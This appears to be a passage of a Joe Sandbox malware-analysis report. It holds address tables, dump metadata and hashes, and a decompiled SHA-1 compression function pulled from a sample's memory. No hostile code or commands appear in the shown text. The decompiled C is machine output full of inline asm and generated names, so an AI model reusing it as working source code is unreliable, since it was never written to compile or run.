                0x003e81a6
                0x003e81a8
                0x00000000
                0x00000000
                0x003e81ae
                0x003e81b4
                0x003e81ba
                0x003e81bc
                0x003e81c0
                0x003e81c6
                0x003e81cd
                0x003e81cf
                0x003e81d2
                0x003e81d2
                0x003e81d2
                0x00000000
                0x003e8108
                0x003e8108
                0x003e810a
                0x00000000
                0x00000000
                0x003e8110
                0x003e8118
                0x003e811b
                0x003e8121
                0x003e8122
                0x003e8125
                0x003e8127
                0x003e7daa
                0x003e7daa
                0x003e7dae
                0x003e7db2
                0x003e7db4
                0x003e786c
                0x003e786c
                0x003e7870
                0x003e7870
                0x003e7870
                0x003e7874
                0x003e7874
                0x003e7877
                0x003e787d
                0x003e787f
                0x003e7882
                0x003e7884
                0x003e7888
                0x00000000
                0x00000000
                0x00000000
                0x003e7888
                0x003e7ed1
                0x003e7edc
                0x003e7edf
                0x003e7ee4
                0x003e7ee6
                0x003e7ee8
                0x003e7f84
                0x003e7f84
                0x003e7f8a
                0x003e7f90
                0x003e7f92
                0x003e7f96
                0x003e7f9c
                0x003e7fa3
                0x003e7fa5
                0x003e7fa8
                0x003e7fa8
                0x003e7fa8
                0x003e79db
                0x003e79db
                0x003e79df
                0x00000000
                0x003e79df
                0x003e7eee
                0x003e7ef0
                0x00000000
                0x00000000
                0x003e7ef6
                0x003e7efe
                0x003e7f01
                0x003e7f07
                0x003e7f08
                0x003e7f0b
                0x003e7f0d
                0x00000000
                0x00000000
                0x003e7f13
                0x003e7f15
                0x003e7f5d
                0x003e7f5d
                0x003e7f60
                0x003e7f64
                0x003e7f66
                0x003e7f69
                0x003e7f6e
                0x003e7f73
                0x003e7f74
                0x003e7f76
                0x003e7f78
                0x003e7f7a
                0x003e7f7a
                0x003e7f7a
                0x003e7da6
                0x003e7da6
                0x00000000
                0x003e7da6
                0x003e7f19
                0x003e7f19
                0x003e7f1c
                0x003e7f1e
                0x003e7f20
                0x003e7f26
                0x003e7f2c
                0x003e7f32
                0x003e7f38
                0x003e7f3e
                0x003e7f44
                0x003e7f47
                0x003e7f4a
                0x003e7f4c
                0x003e7f4f
                0x003e7f51
                0x003e7f51
                0x003e7f51
                0x00000000
                0x003e7e3a
                0x003e7e3a
                0x003e7e3e
                0x003e7e42
                0x003e7e46
                0x003e7e46
                0x003e7e4e
                0x003e7e54
                0x003e7e58
                0x003e7e5e
                0x003e7e60
                0x003e7e64
                0x003e7e6a
                0x003e7e71
                0x003e7e73
                0x003e7e76
                0x003e7e76
                0x003e7e76
                0x00000000
                0x003e7e7b
                0x003e7dbc
                0x003e7dbf
                0x003e7dc3
                0x003e7dc6
                0x00000000
                0x00000000
                0x003e7dcf
                0x003e7dd2
                0x003e7dd6
                0x003e7dd9
                0x00000000
                0x00000000
                0x003e7de2
                0x003e7de5
                0x003e7de9
                0x003e7dec
                0x00000000
                0x00000000
                0x003e7df5
                0x003e7df8
                0x003e7dfc
                0x003e7dff
                0x00000000
                0x00000000
                0x003e7e08
                0x003e7e0b
                0x003e7e0f
                0x003e7e12
                0x00000000
                0x00000000
                0x003e7e1b
                0x003e7e1e
                0x003e7e22
                0x003e7e25
                0x00000000
                0x00000000
                0x003e7e2e
                0x003e7e32
                0x00000000
                0x003e7e32
                0x003e812d
                0x003e812f
                0x003e8177
                0x003e8177
                0x003e817a
                0x003e817e
                0x003e8180
                0x003e8183
                0x003e8188
                0x003e818d
                0x003e818e
                0x003e8190
                0x003e8192
                0x003e8194
                0x003e8194
                0x003e8194
                0x00000000
                0x003e8199
                0x003e8133
                0x003e8133
                0x003e8136
                0x003e8138
                0x003e813a
                0x003e8140
                0x003e8146
                0x003e814c
                0x003e8152
                0x003e8158
                0x003e815e
                0x003e8161
                0x003e8164
                0x003e8166
                0x003e8169
                0x003e816b
                0x003e816b
                0x003e816b
                0x00000000
                0x003e8170
                0x003e8102
                0x003e803b
                0x003e803e
                0x003e803e
                0x003e8040
                0x00000000
                0x00000000
                0x003e8042
                0x003e8043
                0x003e8046
                0x003e8049
                0x00000000
                0x00000000
                0x00000000
                0x003e804b
                0x003e804d
                0x00000000
                0x003e804d
                0x003e7ffa
                0x003e7ffd
                0x003e8007
                0x003e800f
                0x003e8012
                0x003e8018
                0x003e801c
                0x003e801f
                0x003e8027
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003e7fc6
                0x003e7fc6
                0x003e7fc9
                0x003e7fcb
                0x003e7fce
                0x003e7fce
                0x003e7fce
                0x00000000
                0x003e7fc6
                0x003e7ebe
                0x003e7ec1
                0x003e7ec5
                0x003e7ec9
                0x003e7ec9
                0x003e7e88
                0x003e7e8c
                0x003e7e91
                0x003e7e93
                0x00000000
                0x00000000
                0x003e7ea0
                0x003e7ea5
                0x003e7ea7
                0x00000000
                0x00000000
                0x00000000
                0x003e7ead
                0x003e79f4
                0x003e79fa
                0x003e79fd
                0x003e7a74
                0x003e7a77
                0x003e7a7d
                0x003e7a80
                0x003e7a82
                0x003e7a06
                0x003e7a06
                0x003e7a0a
                0x003e7a0c
                0x003e7a13
                0x003e7a19
                0x003e7a1f
                0x003e7a26
                0x003e7abe
                0x003e7abf
                0x003e7ac0
                0x003e7ac4
                0x003e7ac6
                0x003e7ae3
                0x003e7ae3
                0x003e7aec
                0x003e7af2
                0x003e7af8
                0x003e7afc
                0x003e7b00
                0x003e7b04
                0x003e7b07
                0x003e7b0a
                0x003e7b1e
                0x003e7b20
                0x003e7b26
                0x003e7b28
                0x003e7b28
                0x003e7b2a
                0x003e7b32
                0x003e7b32
                0x003e7b35
                0x003e7b38
                0x003e7b4c
                0x003e7b4f
                0x003e7b55
                0x003e7b58
                0x003e7b5c
                0x003e7b5e
                0x003e7b62
                0x003e7b64
                0x003e7cc9
                0x003e7cc9
                0x003e7ccf
                0x003e7cd1
                0x003e7cd2
                0x003e7cd8
                0x003e7cda
                0x003e7cdb
                0x003e7ce1
                0x003e7ce3
                0x003e7ce3
                0x003e7ce3
                0x003e7ce1
                0x003e7cd8
                0x003e7ce7
                0x003e7ced
                0x003e7cf3
                0x003e7cf6
                0x003e7cf9
                0x003e7d04
                0x003e7d06
                0x003e7d0b
                0x003e7d0e
                0x003e7d12
                0x003e7d14
                0x00000000
                0x003e7d1a
                0x003e7d1a
                0x003e7d1c
                0x00000000
                0x00000000
                0x003e7d22
                0x003e7d2a
                0x003e7d2d
                0x003e7d33
                0x003e7d34
                0x003e7d37
                0x003e7d39
                0x00000000
                0x00000000
                0x003e7d3b
                0x003e7d3f
                0x003e7d84
                0x003e7d84
                0x003e7d87
                0x003e7d8b
                0x003e7d8d
                0x003e7d90
                0x003e7d95
                0x003e7d9a
                0x003e7d9b
                0x003e7d9d
                0x003e7d9f
                0x003e7da1
                0x003e7da1
                0x003e7da1
                0x00000000
                0x003e7d8d
                0x003e7d43
                0x003e7d43
                0x003e7d46
                0x003e7d48
                0x003e7d4a
                0x003e7d50
                0x003e7d56
                0x003e7d5c
                0x003e7d62
                0x003e7d68
                0x003e7d6e
                0x003e7d71
                0x003e7d74
                0x003e7d76
                0x003e7d79
                0x003e7d7b
                0x003e7d7b
                0x003e7d7b
                0x00000000
                0x003e7d80
                0x003e7d14
                0x003e7b6a
                0x003e7b6d
                0x003e7c94
                0x003e7c99
                0x003e7ca1
                0x003e7cac
                0x003e7cb0
                0x003e7cbd
                0x003e7cbd
                0x003e7cc0
                0x003e7cc2
                0x003e7cc5
                0x003e7cc5
                0x00000000
                0x003e7cc5
                0x003e7b73
                0x003e7bbc
                0x003e7b75
                0x003e7b79
                0x003e7b84
                0x003e7b8a
                0x003e7b96
                0x003e7b9b
                0x003e7ba4
                0x003e7ba6
                0x003e7baa
                0x003e7bad
                0x003e7bb1
                0x003e7bb5
                0x003e7bb7
                0x003e7bb7
                0x003e7bc2
                0x003e7bc9
                0x003e7bcf
                0x003e7bd5
                0x003e7bdc
                0x003e7c14
                0x003e7c15
                0x003e7c16
                0x003e7c1a
                0x003e7c1c
                0x003e7c3a
                0x003e7c3e
                0x003e7c47
                0x003e7c53
                0x003e7c57
                0x003e7c5a
                0x003e7c5e
                0x003e7c71
                0x003e7c73
                0x003e7c79
                0x003e7c7b
                0x003e7c7b
                0x003e7c7d
                0x00000000
                0x003e7c7d
                0x003e7c24
                0x003e7c27
                0x003e7c27
                0x003e7c29
                0x00000000
                0x00000000
                0x003e7c2b
                0x003e7c2c
                0x003e7c2f
                0x003e7c32
                0x00000000
                0x00000000
                0x00000000
                0x003e7c34
                0x003e7c36
                0x00000000
                0x003e7bde
                0x003e7bde
                0x003e7be4
                0x003e7be7
                0x003e7bf1
                0x003e7c01
                0x003e7c05
                0x003e7c08
                0x003e7c85
                0x003e7c85
                0x003e7c8c
                0x00000000
                0x003e7c8c
                0x003e7bdc
                0x003e7b3a
                0x00000000
                0x003e7b3a
                0x003e7ace
                0x003e7ad1
                0x003e7ad1
                0x003e7ad3
                0x00000000
                0x00000000
                0x003e7ad5
                0x003e7ad6
                0x003e7ad9
                0x003e7adb
                0x00000000
                0x00000000
                0x00000000
                0x003e7add
                0x003e7adf
                0x00000000
                0x003e7adf
                0x003e7a2e
                0x003e7a31
                0x003e7a3b
                0x003e7a46
                0x003e7a48
                0x003e7a4c
                0x003e7a4f
                0x003e7a53
                0x003e7a57
                0x003e7a59
                0x003e7a5c
                0x00000000
                0x003e7a5c
                0x003e7a88
                0x003e7a8d
                0x003e7a93
                0x003e7a9e
                0x003e7aa5
                0x003e7aa7
                0x003e7aab
                0x003e7aae
                0x003e7ab2
                0x003e7ab4
                0x00000000
                0x003e7ab4
                0x003e79ff
                0x003e7a03
                0x003e7a03
                0x00000000
                0x003e7a03
                0x003e79d5
                0x003e79d8
                0x003e79d8
                0x003e79d8
                0x00000000
                0x003e79d8
                0x003e7960
                0x003e7963
                0x003e7963
                0x003e7965
                0x00000000
                0x00000000
                0x003e7967
                0x003e7968
                0x003e796b
                0x003e796e
                0x00000000
                0x00000000
                0x003e7970
                0x00000000
                0x003e7970
                0x003e7976
                0x003e7978
                0x00000000
                0x003e7978
                0x003e7922
                0x003e7925
                0x003e7927
                0x003e7931
                0x003e7939
                0x003e793b
                0x003e793e
                0x003e7940
                0x003e7943
                0x003e794b
                0x00000000
                0x003e794b
                0x003e78d0
                0x003e78d2
                0x00000000
                0x00000000
                0x003e78d6
                0x003e78e1
                0x003e78e7
                0x003e783c
                0x00000000
                0x003e783c
                0x003e78ed
                0x00000000
                0x00000000
                0x003e78f5
                0x003e78fb
                0x00000000
                0x00000000
                0x00000000
                0x003e78fb
                0x003e7874
                0x003e7835
                0x003e7835
                0x00000000
                0x003e7835
                0x003e7813
                0x003e7817
                0x003e7818
                0x003e7819
                0x003e7821
                0x00000000
                0x003e7823
                0x00000000
                0x003e7823

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                • Instruction ID: d3d79744da63715b9d16487c6ed6b747f9c9adf715dd46293310c55a06874e7f
                • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                • Instruction Fuzzy Hash: 4962F97160C3D58FCB16CF29C8805B9BBE1BF95304F198A6DE89A8B386D730E945CB15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DF461 Relevance: .7, Instructions: 694COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 70%
                			E003DF461(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t434;
				intOrPtr _t436;
				intOrPtr _t441;
				void* _t446;
				intOrPtr _t448;
				signed int _t451;
				void* _t453;
				signed int _t459;
				signed int _t465;
				signed int _t471;
				signed int _t478;
				signed int _t481;
				signed int _t488;
				signed int _t511;
				signed int _t518;
				signed int _t525;
				signed int _t545;
				signed int _t554;
				signed int _t563;
				signed int* _t591;
				signed int _t592;
				signed int _t596;
				signed int _t599;
				signed int _t600;
				signed int* _t601;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				signed int _t607;
				signed int* _t608;
				signed int _t609;
				signed int* _t675;
				signed int* _t746;
				signed int _t757;
				signed int _t774;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t787;
				signed int _t788;
				signed int _t792;
				signed int _t797;
				signed int _t801;
				signed int _t805;
				signed int _t807;
				signed int _t810;
				signed int* _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t821;
				signed int _t822;
				signed int _t826;
				signed int _t831;
				signed int _t835;
				signed int _t839;
				signed int* _t840;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t846;
				signed int _t847;
				signed int _t849;
				signed int* _t850;
				signed int _t853;
				signed int _t857;
				signed int _t858;
				signed int* _t862;
				signed int _t863;
				signed int _t865;
				signed int _t866;
				signed int _t870;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t883;
				signed int _t887;
				signed int _t888;
				signed int* _t889;
				signed int _t890;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int _t899;
				signed int _t900;
				signed int _t902;
				signed int _t903;
				signed int* _t904;
				signed int _t905;
				signed int _t907;
				signed int _t908;
				signed int _t910;
				signed int _t911;

				_t912 =  &_v40;
				if(_a16 == 0) {
					_t840 = _a8;
					_v20 = _t840;
					E003F0320(_t840, _a12, 0x40);
					_t912 =  &(( &_v40)[3]);
				} else {
					_t840 = _a12;
					_v20 = _t840;
				}
				_t850 = _a4;
				_t592 = _t850[1];
				_t894 =  *_t850;
				_v28 = _t850[2];
				_v24 = _t850[3];
				_v32 = _t592;
				_v36 = 0;
				_t434 = E003F68E4( *_t840);
				asm("rol edx, 0x5");
				 *_t840 = _t434;
				_t435 = _t840;
				_t596 = (_t592 & (_v24 ^ _v28) ^ _v24) + _t894 + _t434 + _t850[4] + 0x5a827999;
				_v16 = _t840;
				_t853 = _v32;
				asm("ror esi, 0x2");
				_v32 =  &(_t840[3]);
				do {
					_t436 = E003F68E4(_t435[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t436;
					asm("ror ebp, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_v28 ^ _t853) & _t894 ^ _v28) + _t596 + _t436;
					_t441 = E003F68E4( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t441;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_t853 ^ _t894) & _t596 ^ _t853) + _v24 + _t441;
					_t446 = E003F68E4( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t446;
					asm("ror dword [esp+0x2c], 0x2");
					_t853 = _t853 + ((_t596 ^ _t894) & _v24 ^ _t894) + _v28 + 0x5a827999 + _t446;
					_t448 = E003F68E4( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t448;
					_t451 = _v36 + 5;
					asm("ror dword [esp+0x2c], 0x2");
					_v36 = _t451;
					_t894 = _t894 + ((_t596 ^ _v24) & _v28 ^ _t596) + _t853 + _t448 + 0x5a827999;
					_v16 =  &(_t840[_t451]);
					_t453 = E003F68E4(_t840[_t451]);
					_t912 =  &(_t912[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t453;
					_t435 = _v16;
					asm("ror esi, 0x2");
					_t596 = _t596 + 0x5a827999 + ((_v24 ^ _v28) & _t853 ^ _v24) + _t894 + _t453;
				} while (_v36 != 0xf);
				_t774 = _t840[0xe] ^ _t840[9] ^ _t840[1] ^ _t840[3];
				_v32 = _t853;
				_t857 = _t840[0xd] ^ _t840[8] ^  *_t840 ^ _t840[2];
				asm("rol ecx, 0x5");
				asm("rol esi, 1");
				asm("rol edx, 1");
				asm("ror ebp, 0x2");
				_t840[1] = _t774;
				_t459 = ((_v28 ^ _v32) & _t894 ^ _v28) + _t596 + _t857 + _v24 + 0x5a827999;
				 *_t840 = _t857;
				_v40 = _t459;
				asm("rol ecx, 0x5");
				_t778 = _t840[0xf] ^ _t840[0xa] ^ _t840[4] ^ _t840[2];
				_t465 = ((_v32 ^ _t894) & _t596 ^ _v32) + _t459 + _t774 + _v28 + 0x5a827999;
				_v36 = _t465;
				asm("ror ebx, 0x2");
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror dword [esp+0x10], 0x2");
				_t840[2] = _t778;
				_t471 = ((_t596 ^ _t894) & _v40 ^ _t894) + _t465 + _t778 + _v32 + 0x5a827999;
				_v32 = _t471;
				asm("rol ecx, 0x5");
				_t782 = _t840[0xb] ^ _t840[5] ^ _t857 ^ _t840[3];
				_t858 = _v40;
				asm("rol edx, 1");
				_t840[3] = _t782;
				_v24 = _t596;
				asm("ror dword [esp+0x18], 0x2");
				_t783 = 0x11;
				_v28 = ((_t596 ^ _t858) & _v36 ^ _t596) + _t471 + 0x5a827999 + _t782 + _t894;
				_v16 = _t783;
				do {
					_t96 = _t783 + 5; // 0x16
					_t478 = _t96;
					_t97 = _t783 - 5; // 0xc
					_v8 = _t478;
					_t99 = _t783 + 3; // 0x14
					_t896 = _t99 & 0x0000000f;
					_v12 = _t896;
					_t599 = _t478 & 0x0000000f;
					asm("rol ecx, 0x5");
					_t787 = _t840[_t97 & 0x0000000f] ^ _t840[_t783 & 0x0000000f] ^ _t840[_t896] ^ _t840[_t599];
					_t481 = _v16;
					asm("rol edx, 1");
					_t840[_t896] = _t787;
					_t897 = _v32;
					asm("ror ebp, 0x2");
					_v32 = _t897;
					_t862 = _v20;
					_v24 = _v24 + 0x6ed9eba1 + (_t858 ^ _v36 ^ _t897) + _v28 + _t787;
					_t788 = 0xf;
					_t899 = _t481 + 0x00000004 & _t788;
					_t842 = _t481 + 0x00000006 & _t788;
					_t792 =  *(_t862 + (_t481 - 0x00000004 & _t788) * 4) ^  *(_t862 + (_t481 + 0x00000001 & _t788) * 4) ^  *(_t862 + _t899 * 4) ^  *(_t862 + _t842 * 4);
					asm("rol edx, 1");
					 *(_t862 + _t899 * 4) = _t792;
					_t863 = _v28;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v28 = _t863;
					_t488 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v36 ^ _v32 ^ _t863) + _v24 + _t792;
					_t865 = _t488 + 0x00000007 & 0x0000000f;
					_t675 = _v20;
					_t797 = _v20[_t488 - 0x00000003 & 0x0000000f] ^  *(_t675 + (_t488 + 0x00000002 & 0x0000000f) * 4) ^  *(_t675 + _t865 * 4) ^  *(_t675 + _t599 * 4);
					asm("rol edx, 1");
					 *(_t675 + _t599 * 4) = _t797;
					_t600 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t600;
					_t601 = _v20;
					_v36 = _v36 + 0x6ed9eba1 + (_t600 ^ _v32 ^ _v28) + _v40 + _t797;
					asm("rol ecx, 0x5");
					_t801 =  *(_t601 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t601 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t601 + _t842 * 4) ^  *(_t601 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t601 + _t842 * 4) = _t801;
					_t602 = _v24;
					_t843 = _v40;
					asm("ror edi, 0x2");
					_v40 = _t843;
					_t840 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t602 ^ _t843 ^ _v28) + _v36 + _t801;
					_t805 = _t840[_v16 - 0x00000007 & 0x0000000f] ^ _t840[_v16 - 0x00000001 & 0x0000000f] ^ _t840[_t865] ^ _t840[_t899];
					_t900 = _v36;
					asm("rol edx, 1");
					asm("rol ecx, 0x5");
					_t840[_t865] = _t805;
					_t858 = _v40;
					_t783 = _v8;
					asm("ror ebp, 0x2");
					_v36 = _t900;
					_v16 = _t783;
					_v28 = _v28 + 0x6ed9eba1 + (_t602 ^ _t858 ^ _t900) + _v32 + _t805;
				} while (_t783 + 3 <= 0x23);
				_t866 = 0x25;
				_v16 = _t866;
				while(1) {
					_t205 = _t866 + 5; // 0x2a
					_t511 = _t205;
					_t206 = _t866 - 5; // 0x20
					_v4 = _t511;
					_t208 = _t866 + 3; // 0x28
					_t807 = _t208 & 0x0000000f;
					_v8 = _t807;
					_t902 = _t511 & 0x0000000f;
					_t870 = _t840[_t206 & 0x0000000f] ^ _t840[_t866 & 0x0000000f] ^ _t840[_t902] ^ _t840[_t807];
					asm("rol esi, 1");
					_t840[_t807] = _t870;
					asm("ror dword [esp+0x1c], 0x2");
					asm("rol edx, 0x5");
					_t871 = 0xf;
					_v24 = _v28 - 0x70e44324 + ((_v36 | _v32) & _v40 | _v36 & _v32) + _t870 + _t602;
					_t518 = _v16;
					_t604 = _t518 + 0x00000006 & _t871;
					_t810 = _t518 + 0x00000004 & _t871;
					_v12 = _t810;
					_t875 = _t840[_t518 - 0x00000004 & _t871] ^ _t840[_t518 + 0x00000001 & _t871] ^ _t840[_t810] ^ _t840[_t604];
					asm("rol esi, 1");
					_t840[_t810] = _t875;
					_t844 = _v28;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v28 = _t844;
					_t812 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v32 | _t844) & _v36 | _v32 & _t844) + _t875 + _v40;
					_t525 = _v16;
					_t846 = _t525 + 0x00000007 & 0x0000000f;
					_t879 =  *(_t812 + (_t525 - 0x00000003 & 0x0000000f) * 4) ^  *(_t812 + (_t525 + 0x00000002 & 0x0000000f) * 4) ^  *(_t812 + _t846 * 4) ^  *(_t812 + _t902 * 4);
					asm("rol esi, 1");
					 *(_t812 + _t902 * 4) = _t879;
					asm("rol edx, 0x5");
					_t903 = _v24;
					asm("ror ebp, 0x2");
					_t815 = _v40 + 0x8f1bbcdc + ((_t903 | _v28) & _v32 | _t903 & _v28) + _t879 + _v36;
					_v24 = _t903;
					_t904 = _v20;
					_v36 = _t815;
					asm("rol edx, 0x5");
					_t883 =  *(_t904 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t904 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t904 + _v8 * 4) ^  *(_t904 + _t604 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t604 * 4) = _t883;
					_t602 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_t816 = _t815 + ((_t602 | _v40) & _v28 | _t602 & _v40) + 0x8f1bbcdc + _t883 + _v32;
					_v32 = _t816;
					asm("rol edx, 0x5");
					_t887 =  *(_t904 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t904 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t904 + _v12 * 4) ^  *(_t904 + _t846 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t846 * 4) = _t887;
					_t905 = _v36;
					asm("ror ebp, 0x2");
					_v36 = _t905;
					_t309 = _t816 - 0x70e44324; // -4294967294
					_t866 = _v4;
					_v28 = _t309 + ((_v40 | _t905) & _t602 | _v40 & _t905) + _t887 + _v28;
					_v16 = _t866;
					if(_t866 + 3 > 0x37) {
						break;
					}
					_t840 = _v20;
				}
				_t817 = 0x39;
				_v16 = _t817;
				_t847 = _t602;
				do {
					_t315 = _t817 + 5; // 0x3e
					_t545 = _t315;
					_v8 = _t545;
					_t317 = _t817 + 3; // 0x3c
					_t318 = _t817 - 5; // 0x34
					_t888 = 0xf;
					_t907 = _t317 & _t888;
					_t606 = _t545 & _t888;
					_t889 = _v20;
					_v4 = _t907;
					_t821 =  *(_t889 + (_t318 & _t888) * 4) ^  *(_t889 + (_t817 & _t888) * 4) ^  *(_t889 + _t907 * 4) ^  *(_t889 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t907 * 4) = _t821;
					_t908 = _v32;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v32 = _t908;
					_v24 = (_v40 ^ _v36 ^ _t908) + _t821 + _t847 + _v28 + 0xca62c1d6;
					_t554 = _v16;
					_t822 = 0xf;
					_t849 = _t554 + 0x00000006 & _t822;
					_t910 = _t554 + 0x00000004 & _t822;
					_t826 =  *(_t889 + (_t554 - 0x00000004 & _t822) * 4) ^  *(_t889 + (_t554 + 0x00000001 & _t822) * 4) ^  *(_t889 + _t910 * 4) ^  *(_t889 + _t849 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t910 * 4) = _t826;
					_t890 = _v28;
					asm("rol ecx, 0x5");
					_v40 = (_v36 ^ _v32 ^ _t890) + _t826 + _v40 + _v24 + 0xca62c1d6;
					_t563 = _v16;
					asm("ror esi, 0x2");
					_v28 = _t890;
					_t892 = _t563 + 0x00000007 & 0x0000000f;
					_t746 = _v20;
					_t831 = _v20[_t563 - 0x00000003 & 0x0000000f] ^  *(_t746 + (_t563 + 0x00000002 & 0x0000000f) * 4) ^  *(_t746 + _t892 * 4) ^  *(_t746 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t746 + _t606 * 4) = _t831;
					_t607 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t607;
					_t608 = _v20;
					_v36 = (_t607 ^ _v32 ^ _v28) + _t831 + _v36 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t835 = _t608[_v16 - 0x00000008 & 0x0000000f] ^ _t608[_v16 + 0xfffffffe & 0x0000000f] ^ _t608[_v4] ^ _t608[_t849];
					asm("rol edx, 1");
					_t608[_t849] = _t835;
					_t847 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v32 = (_t847 ^ _v40 ^ _v28) + _t835 + _v32 + _v36 + 0xca62c1d6;
					_t839 = _t608[_v16 - 0x00000007 & 0x0000000f] ^ _t608[_v16 - 0x00000001 & 0x0000000f] ^ _t608[_t892] ^ _t608[_t910];
					_t911 = _v36;
					asm("rol edx, 1");
					_t608[_t892] = _t839;
					_t609 = _v40;
					_t893 = _v32;
					asm("ror ebp, 0x2");
					_t817 = _v8;
					asm("rol ecx, 0x5");
					_v36 = _t911;
					_t757 = _t893 + 0xca62c1d6 + (_t847 ^ _t609 ^ _t911) + _t839 + _v28;
					_v16 = _t817;
					_v28 = _t757;
				} while (_t817 + 3 <= 0x4b);
				_t591 = _a4;
				_t591[1] = _t591[1] + _t893;
				_t591[2] = _t591[2] + _t911;
				_t591[3] = _t591[3] + _t609;
				 *_t591 =  *_t591 + _t757;
				_t591[4] = _t591[4] + _t847;
				return _t591;
			}












































































































                0x003df461
                0x003df46d
                0x003df479
                0x003df483
                0x003df488
                0x003df48d
                0x003df46f
                0x003df46f
                0x003df473
                0x003df473
                0x003df490
                0x003df499
                0x003df49c
                0x003df49e
                0x003df4a8
                0x003df4ae
                0x003df4b2
                0x003df4b6
                0x003df4ce
                0x003df4da
                0x003df4de
                0x003df4e0
                0x003df4e2
                0x003df4e6
                0x003df4ea
                0x003df4ed
                0x003df4f1
                0x003df4f4
                0x003df4ff
                0x003df504
                0x003df51e
                0x003df523
                0x003df52e
                0x003df53b
                0x003df540
                0x003df554
                0x003df55b
                0x003df565
                0x003df572
                0x003df57b
                0x003df58b
                0x003df597
                0x003df599
                0x003df5a4
                0x003df5a9
                0x003df5ac
                0x003df5c0
                0x003df5c7
                0x003df5ce
                0x003df5d7
                0x003df5db
                0x003df5df
                0x003df5ea
                0x003df5ed
                0x003df5f0
                0x003df5fc
                0x003df60e
                0x003df611
                0x003df613
                0x003df62d
                0x003df630
                0x003df646
                0x003df649
                0x003df64c
                0x003df650
                0x003df654
                0x003df661
                0x003df664
                0x003df666
                0x003df668
                0x003df674
                0x003df694
                0x003df697
                0x003df699
                0x003df69f
                0x003df6a2
                0x003df6a8
                0x003df6b1
                0x003df6ba
                0x003df6cd
                0x003df6d1
                0x003df6d7
                0x003df6da
                0x003df6df
                0x003df6eb
                0x003df6f5
                0x003df6fa
                0x003df702
                0x003df707
                0x003df708
                0x003df70c
                0x003df710
                0x003df714
                0x003df714
                0x003df717
                0x003df71a
                0x003df721
                0x003df726
                0x003df72b
                0x003df732
                0x003df73c
                0x003df745
                0x003df748
                0x003df74c
                0x003df750
                0x003df753
                0x003df75b
                0x003df76b
                0x003df774
                0x003df778
                0x003df781
                0x003df784
                0x003df786
                0x003df798
                0x003df7a3
                0x003df7a5
                0x003df7a8
                0x003df7ae
                0x003df7b3
                0x003df7c6
                0x003df7cc
                0x003df7d0
                0x003df7e0
                0x003df7e9
                0x003df7f3
                0x003df7f6
                0x003df7f8
                0x003df7ff
                0x003df805
                0x003df814
                0x003df821
                0x003df827
                0x003df82f
                0x003df850
                0x003df853
                0x003df856
                0x003df85a
                0x003df85d
                0x003df863
                0x003df86f
                0x003df87c
                0x003df880
                0x003df88a
